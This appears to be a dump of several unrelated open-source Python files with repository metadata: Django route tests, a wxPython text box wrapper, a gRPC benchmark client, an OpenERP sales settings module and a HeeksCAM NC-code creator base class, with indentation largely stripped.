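# at the server in isolation.  WSGIRequestHandler reads ADMIN_MEDIA_PREFIX,
# so settings are configured inline; the address and port are arbitrary.
if __name__ == '__main__':
    from django.conf import settings
    if not settings.configured:
        settings.configure(ADMIN_MEDIA_PREFIX='/media/')
    def hello_app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return ['Hello from the development server\n']
    run('127.0.0.1', 8000, hello_app)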
| mit |
ccowmu/whatistheplan.com | tests/test_routes.py | 1 | 1776 | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
class RoutesTest(TestCase):
def setUp(self):
self.client = Client()
self.logged_in_client = Client()
self.user = User.objects.create_user("testuser", "[email protected]", "test_password")
self.logged_in_client.login(username="testuser", password="test_password")
def test_home_route(self):
"""Home returns 200"""
response = self.client.get(reverse('Home'))
self.assertEqual(response.status_code, 200)
def test_events_route(self):
"""Events returns 200"""
response = self.client.get(reverse('Events'))
self.assertEqual(response.status_code, 200)
def test_about_route(self):
"""About returns 200"""
response = self.client.get(reverse('About'))
self.assertEqual(response.status_code, 200)
    def test_twitch_route(self):
        """Twitch returns 200"""
        response = self.client.get(reverse('Twitch'))
self.assertEqual(response.status_code, 200)
def test_sign_up_route(self):
"""Sign Up returns 200"""
response = self.client.get(reverse('Sign Up'))
self.assertEqual(response.status_code, 200)
def test_log_in_route(self):
"""Log in returns 200"""
response = self.client.get(reverse('Log In'))
self.assertEqual(response.status_code, 200)
def test_log_out_route_for_logged_in_user(self):
"""Log Out redirects home for a logged in user"""
response = self.logged_in_client.get(reverse('Log Out'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], 'http://testserver/')
def tearDown(self):
self.user.delete()
| mit |
bblais/plasticity | plasticity/dialogs/waxy/textbox.py | 1 | 4652 | # textbox.py
import waxyobject
import wx
import core
import styles
class TextBox(wx.TextCtrl, waxyobject.WaxyObject):
__events__ = {
'Char': wx.EVT_CHAR, # do all controls have this?
'MaxLength': wx.EVT_TEXT_MAXLEN, # alias for TextMaxLen
'Text': wx.EVT_TEXT,
'TextEnter': wx.EVT_TEXT_ENTER,
'TextMaxLen': wx.EVT_TEXT_MAXLEN,
'TextURL': wx.EVT_TEXT_URL,
}
def __init__(self, parent, text="", size=None, **kwargs):
style = 0
style |= self._params(kwargs)
style |= styles.window(kwargs)
wx.TextCtrl.__init__(self, parent, wx.NewId(), text,
size=size or (125,-1), style=style)
self.BindEvents()
styles.properties(self, kwargs)
def write(self, s):
# Added so we can use a TextBox as a file-like object and redirect
# stdout to it.
self.AppendText(s)
try:
core.Yield()
except:
pass
def GetCurrentLineNumber(self):
""" Return the current line number (i.e. the number of the line the
cursor is on). """
pos = self.GetInsertionPoint()
x, y = self.PositionToXY(pos)
return y
def GetLines(self):
""" Return the current text as a list of lines. (Changing the list
does not affect the contents of the TextBox.) """
text = self.GetValue()
lines = text.split("\n")
return lines
def SetModified(self, modified):
if modified:
# set to modified by appending a dummy space and removing it again
self.AppendText(' ')
lastpos = self.GetLastPosition()
self.Remove(lastpos-1, lastpos)
else:
self.DiscardEdits()
def GetModified(self):
""" Returns true if the contents of the control were modified. (Alias
for IsModified(). """
return self.IsModified()
def InsertText(self, pos, text):
""" Insert text at the given position. """
old_insertion_point = self.GetInsertionPoint()
self.SetInsertionPoint(pos)
self.WriteText(text)
# put cursor at original insertion point
if old_insertion_point <= pos:
self.SetInsertionPoint(old_insertion_point)
else:
self.SetInsertionPoint(old_insertion_point + len(text))
# ideas:
# should Remove support negative indexes? (like slices)
# should it support slicing? e.g. del atextbox[10:20]
#
# style parameters
#_textbox_justify = {
# "left": wx.TE_LEFT,
# "center": wx.TE_CENTRE,
# "centre": wx.TE_CENTRE,
# "middle": wx.TE_CENTRE,
# "right": wx.TE_RIGHT,
#}
__styles__ = {
'justify': ({
'left': wx.TE_LEFT,
'center': wx.TE_CENTRE,
'centre': wx.TE_CENTRE,
'middle': wx.TE_CENTRE,
'right': wx.TE_RIGHT,
}, styles.DICTSTART),
'multiline': (wx.TE_MULTILINE, styles.NORMAL),
'password': (wx.TE_PASSWORD, styles.NORMAL),
'readonly': (wx.TE_READONLY, styles.NORMAL),
'wrap': (wx.TE_DONTWRAP, styles.NORMAL | styles.REVERSE),
'process_enter': (wx.TE_PROCESS_ENTER, styles.NORMAL),
'process_tab': (wx.TE_PROCESS_TAB, styles.NORMAL),
'rich': (wx.TE_RICH, styles.NORMAL),
'rich2': (wx.TE_RICH2, styles.NORMAL),
'auto_url': (wx.TE_AUTO_URL, styles.NORMAL),
'hscroll': (wx.HSCROLL, styles.NORMAL),
}
def _params(self, kwargs):
flags = 0 | wx.TE_NOHIDESEL # maybe add the option of changing this one
#flags |= styles.stylebool('multiline', wx.TE_MULTILINE, kwargs)
#flags |= styles.stylebool('password', wx.TE_PASSWORD, kwargs)
#flags |= styles.stylebool('readonly', wx.TE_READONLY, kwargs)
#flags |= styles.stylebool('wrap', wx.TE_DONTWRAP, kwargs, reverse=1)
#flags |= styles.stylebool('process_enter', wx.TE_PROCESS_ENTER, kwargs)
#flags |= styles.stylebool('process_tab', wx.TE_PROCESS_TAB, kwargs)
#flags |= styles.stylebool('rich', wx.TE_RICH, kwargs)
#flags |= styles.stylebool('rich2', wx.TE_RICH2, kwargs)
#flags |= styles.stylebool('auto_url', wx.TE_AUTO_URL, kwargs)
#flags |= styles.stylebool('hscroll', wx.HSCROLL, kwargs)
#flags |= styles.styledictstart('justify', self._textbox_justify, kwargs, 0)
flags |= styles.dostyle(self.__styles__, kwargs)
return flags
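# --- Usage sketch (not part of the original module) ---
# A rough demonstration of the wrapper, assuming a bare wx.Frame is an
# acceptable parent (a waxy Frame would normally be used instead):
if __name__ == '__main__':
    app = wx.App(False)
    frame = wx.Frame(None, -1, 'TextBox demo')
    box = TextBox(frame, text='hello', multiline=True, wrap=True)
    box.write(' world')  # file-like API appends text
    frame.Show()
    app.MainLoop()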
| mit |
wcevans/grpc | src/python/grpcio_tests/tests/qps/benchmark_client.py | 23 | 7701 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines test client behaviors (UNARY/STREAMING) (SYNC/ASYNC)."""
import abc
import threading
import time
from concurrent import futures
from six.moves import queue
import grpc
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import services_pb2
from tests.unit import resources
from tests.unit import test_common
_TIMEOUT = 60 * 60 * 24
class GenericStub(object):
def __init__(self, channel):
self.UnaryCall = channel.unary_unary(
'/grpc.testing.BenchmarkService/UnaryCall')
self.StreamingCall = channel.stream_stream(
'/grpc.testing.BenchmarkService/StreamingCall')
class BenchmarkClient:
"""Benchmark client interface that exposes a non-blocking send_request()."""
__metaclass__ = abc.ABCMeta
def __init__(self, server, config, hist):
# Create the stub
if config.HasField('security_params'):
creds = grpc.ssl_channel_credentials(
resources.test_root_certificates())
channel = test_common.test_secure_channel(
server, creds, config.security_params.server_host_override)
else:
channel = grpc.insecure_channel(server)
# waits for the channel to be ready before we start sending messages
grpc.channel_ready_future(channel).result()
if config.payload_config.WhichOneof('payload') == 'simple_params':
self._generic = False
self._stub = services_pb2.BenchmarkServiceStub(channel)
payload = messages_pb2.Payload(
body='\0' * config.payload_config.simple_params.req_size)
self._request = messages_pb2.SimpleRequest(
payload=payload,
response_size=config.payload_config.simple_params.resp_size)
else:
self._generic = True
self._stub = GenericStub(channel)
self._request = '\0' * config.payload_config.bytebuf_params.req_size
self._hist = hist
self._response_callbacks = []
def add_response_callback(self, callback):
"""callback will be invoked as callback(client, query_time)"""
self._response_callbacks.append(callback)
@abc.abstractmethod
def send_request(self):
"""Non-blocking wrapper for a client's request operation."""
raise NotImplementedError()
def start(self):
pass
def stop(self):
pass
def _handle_response(self, client, query_time):
self._hist.add(query_time * 1e9) # Report times in nanoseconds
for callback in self._response_callbacks:
callback(client, query_time)
class UnarySyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(UnarySyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
def send_request(self):
# Send requests in seperate threads to support multiple outstanding rpcs
# (See src/proto/grpc/testing/control.proto)
self._pool.submit(self._dispatch_request)
def stop(self):
self._pool.shutdown(wait=True)
self._stub = None
def _dispatch_request(self):
start_time = time.time()
self._stub.UnaryCall(self._request, _TIMEOUT)
end_time = time.time()
self._handle_response(self, end_time - start_time)
class UnaryAsyncBenchmarkClient(BenchmarkClient):
def send_request(self):
# Use the Future callback api to support multiple outstanding rpcs
start_time = time.time()
response_future = self._stub.UnaryCall.future(self._request, _TIMEOUT)
response_future.add_done_callback(
lambda resp: self._response_received(start_time, resp))
def _response_received(self, start_time, resp):
resp.result()
end_time = time.time()
self._handle_response(self, end_time - start_time)
def stop(self):
self._stub = None
class _SyncStream(object):
def __init__(self, stub, generic, request, handle_response):
self._stub = stub
self._generic = generic
self._request = request
self._handle_response = handle_response
self._is_streaming = False
self._request_queue = queue.Queue()
self._send_time_queue = queue.Queue()
def send_request(self):
self._send_time_queue.put(time.time())
self._request_queue.put(self._request)
def start(self):
self._is_streaming = True
response_stream = self._stub.StreamingCall(self._request_generator(),
_TIMEOUT)
for _ in response_stream:
self._handle_response(
self, time.time() - self._send_time_queue.get_nowait())
def stop(self):
self._is_streaming = False
def _request_generator(self):
while self._is_streaming:
try:
request = self._request_queue.get(block=True, timeout=1.0)
yield request
except queue.Empty:
pass
class StreamingSyncBenchmarkClient(BenchmarkClient):
def __init__(self, server, config, hist):
super(StreamingSyncBenchmarkClient, self).__init__(server, config, hist)
self._pool = futures.ThreadPoolExecutor(
max_workers=config.outstanding_rpcs_per_channel)
self._streams = [
_SyncStream(self._stub, self._generic, self._request,
self._handle_response)
for _ in xrange(config.outstanding_rpcs_per_channel)
]
self._curr_stream = 0
def send_request(self):
# Use a round_robin scheduler to determine what stream to send on
self._streams[self._curr_stream].send_request()
self._curr_stream = (self._curr_stream + 1) % len(self._streams)
def start(self):
for stream in self._streams:
self._pool.submit(stream.start)
def stop(self):
for stream in self._streams:
stream.stop()
self._pool.shutdown(wait=True)
self._stub = None
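# --- Usage sketch (not part of the original module) ---
# Rough illustration of driving one of these clients by hand, outside the
# QPS worker that normally constructs them.  It assumes a benchmark server
# is already listening on localhost:50051; the ClientConfig and Histogram
# values below are simplified stand-ins for what the driver supplies.
if __name__ == '__main__':
    from src.proto.grpc.testing import control_pb2
    from src.proto.grpc.testing import payloads_pb2
    from tests.qps import histogram
    config = control_pb2.ClientConfig(
        outstanding_rpcs_per_channel=1,
        payload_config=payloads_pb2.PayloadConfig(
            simple_params=payloads_pb2.SimpleProtoParams(
                req_size=16, resp_size=16)))
    hist = histogram.Histogram(resolution=0.01, max_possible=60e9)
    client = UnarySyncBenchmarkClient('localhost:50051', config, hist)
    client.start()
    client.send_request()  # non-blocking; the latency lands in `hist`
    client.stop()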
| bsd-3-clause |
joaormatos/anaconda | Chowdren/chowdren/writers/extensions/EasyScrollbar.py | 1 | 1944 | from chowdren.writers.objects import ObjectWriter
from chowdren.common import get_animation_name, to_c, make_color
from chowdren.writers.events import (ComparisonWriter, ActionMethodWriter,
ConditionMethodWriter, ExpressionMethodWriter, make_table)
from mmfparser.bitdict import BitDict
from mmfparser.data.font import LogFont
import glob, os
class ScrollbarObject(ObjectWriter):
class_name = 'ScrollbarObject'
filename = 'scrollbarext'
def write_init(self, writer):
data = self.get_data()
width = data.readShort(True)
height = data.readShort(True)
#hidden = data.readByte() != 0
#enabled = data.readByte() != 0
#tab_stop = data.readByte() != 0
data.skipBytes(3)
vertical = data.readByte() != 0
min_val = data.readInt(True)
max_val = data.readInt(True)
val = data.readInt(True)
# Last 4 bytes are always '4 0 0 0' (?)
writer.putlnc('width = %s;', width)
writer.putlnc('height = %s;', height)
writer.putlnc('vertical = %s;', vertical)
writer.putlnc('min_val = %s;', min_val)
writer.putlnc('max_val = %s;', max_val)
writer.putlnc('init_scrollbar(%s);', val)
def has_updates(self):
return True
#def get_sources(self):
# script_dir = os.path.dirname(__file__)
# base_dir = os.path.join(script_dir, '..', '..', '..', 'base')
# base_dir = os.path.abspath(base_dir)
# print glob.glob(os.path.join(base_dir, 'staticlibs', 'gwen', '*.cpp'))
# return ['objects/scrollbarext.cpp']
actions = make_table(ActionMethodWriter, {
1 : 'set_scroll_range',
9 : 'set_width',
10 : 'set_height',
11 : 'set_visible(true)',
12 : 'set_visible(false)'
})
conditions = make_table(ConditionMethodWriter, {
})
expressions = make_table(ExpressionMethodWriter, {
0 : 'get_value'
})
def get_object():
return ScrollbarObject
| gpl-3.0 |
0k/OpenUpgrade | addons/sale_stock/res_config.py | 331 | 5235 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.tools.translate import _
class sale_configuration(osv.osv_memory):
_inherit = 'sale.config.settings'
_columns = {
'group_invoice_deli_orders': fields.boolean('Generate invoices after and based on delivery orders',
implied_group='sale_stock.group_invoice_deli_orders',
help="To allow your salesman to make invoices for Delivery Orders using the menu 'Deliveries to Invoice'."),
'task_work': fields.boolean("Prepare invoices based on task's activities",
help='Lets you transfer the entries under tasks defined for Project Management to '
'the Timesheet line entries for particular date and particular user with the effect of creating, editing and deleting either ways '
                 'and to automatically create project tasks from procurement lines.\n'
'-This installs the modules project_timesheet and sale_service.'),
'default_order_policy': fields.selection(
[('manual', 'Invoice based on sales orders'), ('picking', 'Invoice based on deliveries')],
'The default invoicing method is', default_model='sale.order',
help="You can generate invoices based on sales orders or based on shippings."),
'module_delivery': fields.boolean('Allow adding shipping costs',
help='Allows you to add delivery methods in sales orders and delivery orders.\n'
'You can define your own carrier and delivery grids for prices.\n'
'-This installs the module delivery.'),
'default_picking_policy' : fields.boolean("Deliver all at once when all products are available.",
help = "Sales order by default will be configured to deliver all products at once instead of delivering each product when it is available. This may have an impact on the shipping price."),
'group_mrp_properties': fields.boolean('Product properties on order lines',
implied_group='sale.group_mrp_properties',
help="Allows you to tag sales order lines with properties."),
'module_project_timesheet': fields.boolean("Project Timesheet"),
'module_sale_service': fields.boolean("Sale Service"),
'group_route_so_lines': fields.boolean('Choose MTO, drop shipping,... on sales order lines',
implied_group='sale_stock.group_route_so_lines',
help="Allows you to choose a delivery route on sales order lines"),
}
_defaults = {
'default_order_policy': 'manual',
}
def default_get(self, cr, uid, fields, context=None):
res = super(sale_configuration, self).default_get(cr, uid, fields, context)
# task_work, time_unit depend on other fields
res['task_work'] = res.get('module_sale_service') and res.get('module_project_timesheet')
return res
def get_default_sale_config(self, cr, uid, ids, context=None):
ir_values = self.pool.get('ir.values')
default_picking_policy = ir_values.get_default(cr, uid, 'sale.order', 'picking_policy')
return {
'default_picking_policy': default_picking_policy == 'one',
}
def set_sale_defaults(self, cr, uid, ids, context=None):
if uid != SUPERUSER_ID and not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise openerp.exceptions.AccessError(_("Only administrators can change the settings"))
ir_values = self.pool.get('ir.values')
wizard = self.browse(cr, uid, ids)[0]
default_picking_policy = 'one' if wizard.default_picking_policy else 'direct'
ir_values.set_default(cr, SUPERUSER_ID, 'sale.order', 'picking_policy', default_picking_policy)
res = super(sale_configuration, self).set_sale_defaults(cr, uid, ids, context)
return res
def onchange_invoice_methods(self, cr, uid, ids, group_invoice_so_lines, group_invoice_deli_orders, context=None):
if not group_invoice_deli_orders:
return {'value': {'default_order_policy': 'manual'}}
if not group_invoice_so_lines:
return {'value': {'default_order_policy': 'picking'}}
return {}
| agpl-3.0 |
play113/swer | heekscam-read-only/nc/nc.py | 25 | 20718 | ################################################################################
# nc.py
#
# Base class for NC code creation
# And global functions for calling current creator
#
# Hirutso Enni, 2009-01-13
# altered by Dan Falck 2010-08-04
# added tap() arguments Michael Haberler 2010-10-07
################################################################################
ncOFF = 0
ncLEFT = -1
ncRIGHT = +1
ncCW = -1
ncCCW = +1
ncMIST = 1
ncFLOOD = 2
################################################################################
class Creator:
def __init__(self):
pass
############################################################################
## Internals
def file_open(self, name):
self.file = open(name, 'w')
self.filename = name
def file_close(self):
self.file.close()
def write(self, s):
self.file.write(s)
############################################################################
## Programs
def program_begin(self, id, name=''):
"""Begin a program"""
pass
def add_stock(self, type_name, params):
pass
def program_stop(self, optional=False):
"""Stop the machine"""
pass
def program_end(self):
"""End the program"""
pass
def flush_nc(self):
"""Flush all pending codes"""
pass
############################################################################
## Subprograms
def sub_begin(self, id, name=''):
"""Begin a subprogram"""
pass
def sub_call(self, id):
"""Call a subprogram"""
pass
def sub_end(self):
"""Return from a subprogram"""
pass
############################################################################
## Settings
def imperial(self):
"""Set imperial units"""
pass
def metric(self):
"""Set metric units"""
pass
def absolute(self):
"""Set absolute coordinates"""
pass
def incremental(self):
"""Set incremental coordinates"""
pass
def polar(self, on=True):
"""Set polar coordinates"""
pass
def set_plane(self, plane):
"""Set plane"""
pass
def set_temporary_origin(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Set temporary origin G92"""
pass
def remove_temporary_origin(self):
"""Remote temporary origin G92.1"""
pass
############################################################################
## Tools
def tool_change(self, id):
"""Change the tool"""
pass
def tool_defn(self, id, name='', params=None):
"""Define a tool"""
pass
def offset_radius(self, id, radius=None):
"""Set tool radius offsetting"""
pass
def offset_length(self, id, length=None):
"""Set tool length offsetting"""
pass
def current_tool(self):
return None
############################################################################
## Datums
def datum_shift(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Shift the datum"""
pass
def datum_set(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Set the datum"""
pass
def workplane(self, id):
"""Set the workplane"""
pass
def clearanceplane(self,z=None):
"""set clearance plane"""
pass
############################################################################
## APT360 like Transformation Definitions
## These definitions were created while looking at Irvin Kraal's book on APT
    ## - Numerical Control Programming in APT - page 211
def matrix(self,a1=None,b1=None,c1=None,a2=None,b2=None,c2=None,a3=None,b3=None,c3=None):
"""Create a matrix for transformations"""
pass
def translate(self,x=None,y=None,z=None):
"""Translate in x,y,z direction"""
pass
def rotate(self,xyrot=None,yzrot=None,zxrot=None,angle=None):
"""Rotate about a coordinate axis"""
pass
def scale(self,k=None):
"""Scale by factor k"""
pass
def matrix_product(self,matrix1=None,matrix2=None):
"""Create matrix that is the product of two other matrices"""
pass
def mirror_plane(self,plane1=None,plane2=None,plane3=None):
"""Mirror image about one or more coordinate planes"""
pass
def mirror_line(self,line=None):
"""Mirror about a line"""
pass
############################################################################
## Rates + Modes
def feedrate(self, f):
"""Set the feedrate"""
pass
def feedrate_hv(self, fh, fv):
"""Set the horizontal and vertical feedrates"""
pass
def spindle(self, s, clockwise=True):
"""Set the spindle speed"""
pass
def coolant(self, mode=0):
"""Set the coolant mode"""
pass
def gearrange(self, gear=0):
"""Set the gear range"""
pass
############################################################################
## Moves
def rapid(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Rapid move"""
pass
    def feed(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Feed move"""
pass
def arc_cw(self, x=None, y=None, z=None, i=None, j=None, k=None, r=None):
"""Clockwise arc move"""
pass
def arc_ccw(self, x=None, y=None, z=None, i=None, j=None, k=None, r=None):
"""Counterclockwise arc move"""
pass
def dwell(self, t):
"""Dwell"""
pass
def rapid_home(self, x=None, y=None, z=None, a=None, b=None, c=None):
"""Rapid relative to home position"""
pass
def rapid_unhome(self):
"""Return from rapid home"""
pass
def set_machine_coordinates(self):
"""Set machine coordinates"""
pass
############################################################################
## Cutter radius compensation
def use_CRC(self):
"""CRC"""
return False
############################################################################
## Cycles
def pattern(self):
"""Simple pattern eg. circle, rect"""
pass
def pocket(self):
"""Pocket routine"""
pass
def profile(self):
"""Profile routine"""
pass
def drill(self, x=None, y=None, dwell=None, depthparams = None, retract_mode=None, spindle_mode=None, internal_coolant_on=None, rapid_to_clearance=None):
"""Drilling routines"""
pass
# original prototype was:
# def tap(self, x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, pitch=None, stoppos=None, spin_in=None, spin_out=None):
#
# current call is like so:
# tap(x=10, y=10, z=0, tap_mode=0, depth=12.7, standoff=6.35, direction=0, pitch=1.25)
# just add tap_mode & direction parameters
def tap(self, x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, pitch=None, stoppos=None, spin_in=None, spin_out=None, tap_mode=None, direction=None):
"""Tapping routines"""
pass
def bore(self, x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, feed_in=None, feed_out=None, stoppos=None, shift_back=None, shift_right=None, backbore=False, stop=False):
"""Boring routines"""
pass
def end_canned_cycle(self):
pass
############################################################################
## Misc
def comment(self, text):
"""Insert a comment"""
pass
def insert(self, text):
"""APT style INSERT statement"""
pass
def block_delete(self, on=False):
"""block to ignore if block delete switch is on"""
pass
def variable(self, id):
"""Insert a variable"""
pass
def variable_set(self, id, value):
"""Set a variable"""
pass
def probe_linear_centre_outside(self, x1=None, y1=None, depth=None, x2=None, y2=None ):
pass
def probe_single_point(self, point_along_edge_x=None, point_along_edge_y=None, depth=None, retracted_point_x=None, retracted_point_y=None, destination_point_x=None, destination_point_y=None, intersection_variable_x=None, intersection_variable_y=None, probe_offset_x_component=None, probe_offset_y_component=None ):
pass
def probe_downward_point(self, x=None, y=None, depth=None, intersection_variable_z=None):
pass
def report_probe_results(self, x1=None, y1=None, z1=None, x2=None, y2=None, z2=None, x3=None, y3=None, z3=None, x4=None, y4=None, z4=None, x5=None, y5=None, z5=None, x6=None, y6=None, z6=None, xml_file_name=None ):
pass
def open_log_file(self, xml_file_name=None ):
pass
def log_coordinate(self, x=None, y=None, z=None):
pass
def log_message(self, message=None):
pass
def close_log_file(self):
pass
def rapid_to_midpoint(self, x1=None, y1=None, z1=None, x2=None, y2=None, z2=None):
pass
def rapid_to_intersection(self, x1, y1, x2, y2, x3, y3, x4, y4, intersection_x, intersection_y, ua_numerator, ua_denominator, ua, ub_numerator, ub):
pass
def rapid_to_rotated_coordinate(self, x1, y1, x2, y2, ref_x, ref_y, x_current, y_current, x_final, y_final):
pass
def set_path_control_mode(self, mode, motion_blending_tolerance, naive_cam_tolerance ):
pass
############################################################################
## NC code creator for additive machines like RepRap
def wipe(self):
"""wipe routine"""
pass
def extruder_on(self):
"""Turn on the extruder"""
pass
def extruder_off(self):
"""turn off the extruder"""
pass
def set_extruder_flowrate(self, flowrate):
"""Set the flowrate for the extruder"""
pass
def extruder_temp(self, temp):
"""Set the extruder temp in celsius"""
pass
def fan_on(self):
"""turn on the cooling fan"""
pass
def fan_off(self):
"""turn off the cooling fan"""
pass
def build_bed_temp(self, temp):
"""Set the bed temp in celsius"""
pass
def chamber_temp(self, temp):
"""Set the chamber temp in celsius"""
pass
def begin_ncblock(self):
# if the moves have come from backplotting nc code, then the nc code text can be given with these three functions
pass
def end_ncblock(self):
pass
def add_text(self, s, col, cdata):
pass
################################################################################
creator = Creator()
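# Minimal usage sketch (an illustrative assumption, not part of this module:
# concrete post-processors subclass Creator, override the writer methods, and
# install an instance as the module-level 'creator' before the wrapper
# functions below are called):
#
#   import nc  # assuming this module is importable as 'nc'
#
#   class GCodeCreator(nc.Creator):
#       def rapid(self, x=None, y=None, z=None, a=None, b=None, c=None):
#           self.write("G00 X%.3f Y%.3f Z%.3f\n" % (x or 0.0, y or 0.0, z or 0.0))
#
#   nc.creator = GCodeCreator()
#   nc.output('part.tap')      # opens the output file via creator.file_open()
#   nc.rapid(x=0, y=0, z=10)   # delegates to creator.rapid()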
############################################################################
## Internals
def write(s):
creator.write(s)
def output(filename):
creator.file_open(filename)
############################################################################
## Programs
def program_begin(id, name=''):
creator.program_begin(id, name)
def add_stock(type_name, params):
creator.add_stock(type_name, params)
def program_stop(optional=False):
creator.program_stop(optional)
def program_end():
creator.program_end()
def flush_nc():
creator.flush_nc()
############################################################################
## Subprograms
def sub_begin(id, name=''):
creator.sub_begin(id, name)
def sub_call(id):
creator.sub_call(id)
def sub_end():
creator.sub_end()
############################################################################
## Settings
def imperial():
creator.imperial()
def metric():
creator.metric()
def absolute():
creator.absolute()
def incremental():
creator.incremental()
def polar(on=True):
creator.polar(on)
def set_plane(plane):
creator.set_plane(plane)
def set_temporary_origin(x=None, y=None, z=None, a=None, b=None, c=None):
creator.set_temporary_origin(x,y,z,a,b,c)
def remove_temporary_origin():
creator.remove_temporary_origin()
############################################################################
## Tools
def tool_change(id):
creator.tool_change(id)
def tool_defn(id, name='', params=None):
creator.tool_defn(id, name, params)
def offset_radius(id, radius=None):
creator.offset_radius(id, radius)
def offset_length(id, length=None):
creator.offset_length(id, length)
def current_tool():
    return creator.current_tool()
############################################################################
## Datums
def datum_shift(x=None, y=None, z=None, a=None, b=None, c=None):
creator.datum_shift(x, y, z, a, b, c)
def datum_set(x=None, y=None, z=None, a=None, b=None, c=None):
creator.datum_set(x, y, z, a, b, c)
def workplane(id):
creator.workplane(id)
def clearanceplane(z=None):
creator.clearanceplane(z)
############################################################################
## APT360 like Transformation Definitions
## These definitions were created while looking at Irvin Kraal's book on APT
## - Numerical Control Programming in APT - page 211
def matrix(a1=None,b1=None,c1=None,a2=None,b2=None,c2=None,a3=None,b3=None,c3=None):
creator.matrix(a1,b1,c1,a2,b2,c2,a3,b3,c3)
def translate(x=None,y=None,z=None):
creator.translate(x,y,z)
def rotate(xyrot=None,yzrot=None,zxrot=None,angle=None):
creator.rotate(xyrot,yzrot,zxrot,angle)
def scale(k=None):
creator.scale(k)
def matrix_product(matrix1=None,matrix2=None):
creator.matrix_product(matrix1,matrix2)
def mirror_plane(plane1=None,plane2=None,plane3=None):
creator.mirror_plane(plane1,plane2,plane3)
def mirror_line(line=None):
creator.mirror_line(line)
############################################################################
## Rates + Modes
def feedrate(f):
creator.feedrate(f)
def feedrate_hv(fh, fv):
creator.feedrate_hv(fh, fv)
def spindle(s, clockwise=True):
creator.spindle(s, clockwise)
def coolant(mode=0):
creator.coolant(mode)
def gearrange(gear=0):
creator.gearrange(gear)
############################################################################
## Moves
def rapid(x=None, y=None, z=None, a=None, b=None, c=None):
creator.rapid(x, y, z, a, b, c)
def feed(x=None, y=None, z=None, a=None, b=None, c=None):
    creator.feed(x, y, z, a, b, c)
def arc_cw(x=None, y=None, z=None, i=None, j=None, k=None, r=None):
creator.arc_cw(x, y, z, i, j, k, r)
def arc_ccw(x=None, y=None, z=None, i=None, j=None, k=None, r=None):
creator.arc_ccw(x, y, z, i, j, k, r)
def dwell(t):
creator.dwell(t)
def rapid_home(x=None, y=None, z=None, a=None, b=None, c=None):
creator.rapid_home(x, y, z, a, b, c)
def rapid_unhome():
creator.rapid_unhome()
def set_machine_coordinates():
creator.set_machine_coordinates()
############################################################################
## Cutter radius compensation
def use_CRC():
return creator.use_CRC()
def CRC_nominal_path():
return creator.CRC_nominal_path()
def start_CRC(left = True, radius = 0.0):
creator.start_CRC(left, radius)
def end_CRC():
creator.end_CRC()
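# Note: the base Creator above does not define CRC_nominal_path/start_CRC/
# end_CRC; these wrappers assume the active creator subclass provides them.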
############################################################################
## Cycles
def pattern():
creator.pattern()
def pocket():
creator.pocket()
def profile():
creator.profile()
def drill(x=None, y=None, dwell=None, depthparams = None, retract_mode=None, spindle_mode=None, internal_coolant_on=None, rapid_to_clearance=None):
creator.drill(x, y, dwell, depthparams, retract_mode, spindle_mode, internal_coolant_on, rapid_to_clearance)
def tap(x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, pitch=None, stoppos=None, spin_in=None, spin_out=None, tap_mode=None, direction=None):
creator.tap(x, y, z, zretract, depth, standoff, dwell_bottom, pitch, stoppos, spin_in, spin_out, tap_mode, direction)
